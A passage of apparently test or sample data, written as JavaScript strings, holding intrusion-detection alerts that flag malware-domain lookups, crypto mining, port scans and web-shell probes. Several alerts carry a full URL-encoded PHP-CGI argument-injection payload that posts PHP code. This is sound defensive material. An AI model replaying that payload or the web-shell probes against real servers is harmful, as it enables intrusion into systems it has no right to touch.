    '"2021-01-11 03:30:01.673618" r2d2 2.200.109.58 65133 212.67.2.2 53 UDP DNS (ps.nis.nnov).su "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:30:24.044449" r2d2 178.17.174.14 40680 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:30:24.044442" r2d2 178.17.174.14 40680 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET4.0C\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:30:32.111836" r2d2 178.17.174.14 41284 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; SynapseWorkstation.3.2.1; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:30:32.111784" r2d2 178.17.174.14 41284 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2; SynapseWorkstation.3.2.1; .NET4.0C; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:30:42.161712" r2d2 10.3.160.42 30896 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:30:42.262842" r2d2 10.3.160.42 30896 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:30:42.361321" r2d2 10.3.160.42 30896 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:30:42.861181" r2d2 10.3.160.42 30896 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:30:44.361149" r2d2 10.3.160.42 30896 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:30:55.501571" r2d2 10.43.192.103 58675 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:30:58.025142" r2d2 2.200.110.232 65377 2.200.107.169 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:30:58.062810" r2d2 2.200.110.233 63382 2.200.107.168 53 UDP DNS taxonprofits.com "cryptowall (malware)" (static)\n' +
    '"2021-01-11 03:30:59.623365" r2d2 2.200.110.232 65437 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:30:59.625905" r2d2 2.200.110.232 64511 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:31:01.296540" r2d2 2.200.110.233 63556 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:30:59.057242" r2d2 178.17.174.14 43538 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB6; \\(R1 1.6\\); .NET CLR 1.1.4322; .NET CLR 2.0.50727; OfficeLiveConnector.1.3; OfficeLivePatch.0.0\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:31:07.561538" r2d2 10.43.192.103 58680 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:31:15.835935" r2d2 2.200.107.146 15200 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:31:15.834816" r2d2 2.200.110.232 64140 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:31:25.687215" r2d2 10.43.192.103 58683 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:31:37.749039" r2d2 10.43.192.103 58685 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:31:43.387586" r2d2 2.200.110.232 64741 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:31:43.390346" r2d2 2.200.107.146 32479 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:31:43.781167" r2d2 10.43.192.103 58686 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:31:54.659538" r2d2 178.17.174.14 46594 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MS-RTC EA 2; .NET4.0C; McAfee\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:32:04.166167" r2d2 2.200.110.232 49332 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:32:07.931055" r2d2 10.43.192.103 58693 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:08.387568" r2d2 2.200.110.232 65341 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:32:08.439542" r2d2 2.200.110.233 63704 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:32:11.296569" r2d2 2.200.110.232 64243 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:32:11.324932" r2d2 2.200.110.233 63887 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:32:08.680670" r2d2 178.17.174.14 47914 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; FunWebProducts; BOIE9;ENUS\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:32:19.992948" r2d2 10.43.192.103 58696 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:25.313148" r2d2 2.200.110.232 63775 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:32:38.101992" r2d2 10.43.192.103 58699 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:47.558078" r2d2 2.200.97.1 53721 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:32:50.184736" r2d2 10.43.192.103 58701 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:55.280370" r2d2 2.200.105.226 58540 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:55.280499" r2d2 2.200.105.226 58540 208.67.222.123 53 UDP DNS donate.ssl.xmrig.com "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:56.234078" r2d2 10.43.192.103 58702 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:32:59.607968" r2d2 2.200.110.232 49268 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:32:59.609422" r2d2 2.200.107.146 54940 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:33:08.302985" r2d2 10.43.192.103 58704 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:33:21.328611" r2d2 2.200.110.232 49209 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:33:21.330129" r2d2 2.200.107.146 18593 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:33:21.355773" r2d2 2.200.110.233 63401 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:33:26.400176" r2d2 10.43.192.103 58707 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:33:32.000606" r2d2 2.200.108.59 11759,11760,11764,11766,11767,33394,33892,33960,34094,34912,35768,36054,36190,36494,37362,37462,37494,38048,38274,38834,39458,39476,39672,39674,39816,39856,39992,40068,41414,42307,42308,42309,42310,42311,42312,42314,42315,43168,43438,43642,43766,44590,44600,44684,46220,46442,47292,47576,48228,48432,48433,48434,48472,48628,48686,49270,49622,50908,50946,51704,52204,52292,52846,54390,55242,55466,55622,55824,56116,57598,57828,58020,59684,59738,59974,60326,60562,60648 77.53.81.105 21,8210,12135,13631,13918,14121,18561,18794,19674,21354,21468,21579,21917,23052,25891,26647,26785,26818,28178,28822,29962,30021,31220,31915,33491,33695,34855,35357,36414,36502,36800,39166,40152,40176,42334,42997,44528,44543,44956,46120,47397,48529,48547,48818,51458,52911,53455,53579,53995,54048,54817,57764,58508,59472,59772,59987,60173,60722,60833,61345,62767,62971,64496,64984 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:33:38.466733" r2d2 10.43.192.103 58709 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:33:32.000558" r2d2 2.200.108.59 11757,11761,11762,11765,33120,33296,33394,33552,33960,34258,34472,34614,35120,35230,35768,35880,36556,38048,38316,38842,39476,39674,39992,40228,40882,41230,41576,42309,42312,42313,42542,43168,43218,43438,43642,44310,44590,45014,45340,45446,45634,46220,46442,47576,47988,48136,48146,48398,48428,48431,48432,48448,48812,49082,49622,49940,50046,51704,51804,51826,53312,54006,54172,54390,55242,55488,57758,57774,57800,57880,58064,58238,58546,58674,59062,59974,60360,60468,60702,60858 77.53.81.105 21,7331,9579,10879,12126,13532,13593,13918,14121,14272,14462,15516,15655,15866,16778,18567,18800,21254,21468,21917,22146,23428,23764,25358,25590,25636,26785,30320,31191,32116,32814,34855,35508,35682,35770,36414,36844,37232,37621,39955,40176,40647,40754,40782,42334,46040,47397,47540,48529,48547,49496,51241,52478,53455,53995,54414,54817,56044,57186,57764,58508,59412,59823,59987,60013,61345,62037,63184,64482,64496,64886,65188 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:33:32.000548" r2d2 2.200.108.59 11758,11759,11761,11762,11763,11764,11767,33552,34258,34614,35120,35782,36190,36316,36494,37362,37494,38100,38316,38804,39458,39816,40068,41414,41576,42224,42307,42310,42315,42316,42542,43162,44310,44394,44600,44684,45340,45446,46062,46612,47120,48136,48180,48428,48429,48430,48431,48432,48433,48434,48594,48628,48686,49204,49940,50046,50316,50784,50890,51424,51686,51804,51826,52368,53054,54006,54018,54172,54846,55530,55546,56116,57598,57880,58238,58388,58546,58674,59826,60326,60468,60470,60562,60648,60702,60858 77.53.81.105 21,7639,8210,9455,9579,10709,10879,11795,12126,12602,13532,13593,14272,15866,16542,18794,21354,22146,23052,23428,23764,25358,25590,25636,26647,28178,28596,28676,28736,29428,31191,32091,32284,32660,32814,33448,33491,33695,35420,37232,40782,42997,44543,44956,45657,46040,46120,49725,51152,51252,51458,51521,52478,53503,54048,54328,54656,55564,56675,57186,57611,59772,59823,60013,60722,62037,62049,62971,63184 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:33:44.501702" r2d2 10.43.192.103 58710 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:33:52.944811" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP HTTP "2.200.110.170(/cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:33:54.273234" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP HTTP "2.200.110.170(/cgi-bin/php5?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:33:54.602705" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP HTTP "2.200.110.170(/cgi-bin/php-cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:33:54.931275" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP HTTP "2.200.110.170(/cgi-bin/php.cgi?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:33:55.260178" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP HTTP "2.200.110.170(/cgi-bin/php4?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%6e \\(POST <?php%20die%28@md5%28PHP-CGI%29%29;%20?>\\))" "potential php injection (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:33:56.569751" r2d2 10.43.192.103 58712 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:33:52.648544" r2d2 178.17.174.14 54398 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.1; .NET CLR 1.1.4322; MySpace;; MySpace;\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:34:05.192511" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:34:14.697033" r2d2 10.43.192.103 58715 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:34:17.765341" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:34:18.000927" r2d2 178.17.174.14 58016 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; GTB7.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; .NET CLR 1.1.4322; .NET4.0C; AskTbPSI/5.8.0.12304\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:34:23.082851" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:34:23.411739" r2d2 45.144.136.187 41560 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:34:31.360440" r2d2 2.200.110.232 64715 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:34:31.389415" r2d2 2.200.110.233 63639 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:34:32.770104" r2d2 10.43.192.103 58720 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:34:29.412450" r2d2 10.1.19.42 59591 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:34:38.237337" r2d2 2.200.110.233 64482 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:34:43.384020" r2d2 2.200.110.232 49155 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:34:43.385535" r2d2 2.200.107.146 60637 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:34:48.333325" r2d2 2.200.104.184 65251 205.251.192.236 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:34:48.419841" r2d2 2.200.104.184 61020 205.251.192.236 53 UDP DNS juronu.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:34:56.895611" r2d2 10.43.192.103 58742 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:34:55.814617" r2d2 178.17.174.14 60696 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(Windows NT 6.1; WOW64; Trident/7.0; FunWebProducts; MATM; rv:11.0\\) like Gecko)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:34:55.814613" r2d2 178.17.174.14 60696 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(Windows NT 6.1; WOW64; Trident/7.0; FunWebProducts; MATM; rv:11.0\\) like Gecko)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:35:08.977859" r2d2 10.43.192.103 58744 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:21.054862" r2d2 10.43.192.103 58759 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:33.123314" r2d2 10.43.192.103 58761 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:38.442713" r2d2 2.200.110.232 64091 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:35:38.443988" r2d2 2.200.107.146 59333 52.57.28.60 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:35:38.472474" r2d2 2.200.110.233 63732 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:35:39.158433" r2d2 10.43.192.103 58762 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:41.393389" r2d2 2.200.110.232 64257 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:35:41.422258" r2d2 2.200.110.233 63768 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:35:42.126875" r2d2 45.144.136.187 5367 2.200.110.170 80 TCP URL (2.200.110.170/images/stories)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:35:51.224800" r2d2 10.43.192.103 58777 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:57.259326" r2d2 10.43.192.103 58778 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:35:59.201861" r2d2 45.144.136.187 5367 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:35:59.608084" r2d2 2.200.110.232 49208 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:35:59.609769" r2d2 2.200.107.146 36789 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:36:09.331120" r2d2 10.43.192.103 58794 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:36:21.407511" r2d2 10.43.192.103 58796 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:36:27.442232" r2d2 10.43.192.103 58810 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:36:28.121564" r2d2 45.144.136.187 17722 2.200.110.170 80 TCP URL (2.200.110.170)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:29.434811" r2d2 45.144.136.187 17722 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:37.989992" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:37.989989" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:39.496465" r2d2 10.43.192.103 58812 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:36:43.394583" r2d2 2.200.110.232 64251 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:36:43.396441" r2d2 2.200.107.146 14282 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:36:39.514823" r2d2 45.248.192.48 33923 2.200.110.148 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:36:39.514818" r2d2 45.248.192.48 33923 2.200.110.148 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:36:51.428130" r2d2 2.200.110.233 65225 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:36:51.580734" r2d2 10.43.192.103 58818 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:36:58.110058" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:58.110062" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:58.439632" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:36:58.439628" r2d2 45.144.136.187 28835 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:37:03.643952" r2d2 10.43.192.103 58820 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:37:08.464084" r2d2 10.1.19.42 59593 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:37:09.686725" r2d2 10.43.192.103 58826 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:37:17.416016" r2d2 2.200.110.232 49435 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 03:37:17.417741" r2d2 2.200.107.146 15403 199.249.121.1 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 03:37:17.444276" r2d2 2.200.110.233 64484 2.200.107.168 53 UDP DNS epicunitscan.info "patchbrowse (malware)" (static)\n' +
    '"2021-01-11 03:37:21.759147" r2d2 10.43.192.103 58828 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:37:33.834049" r2d2 10.43.192.103 58831 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
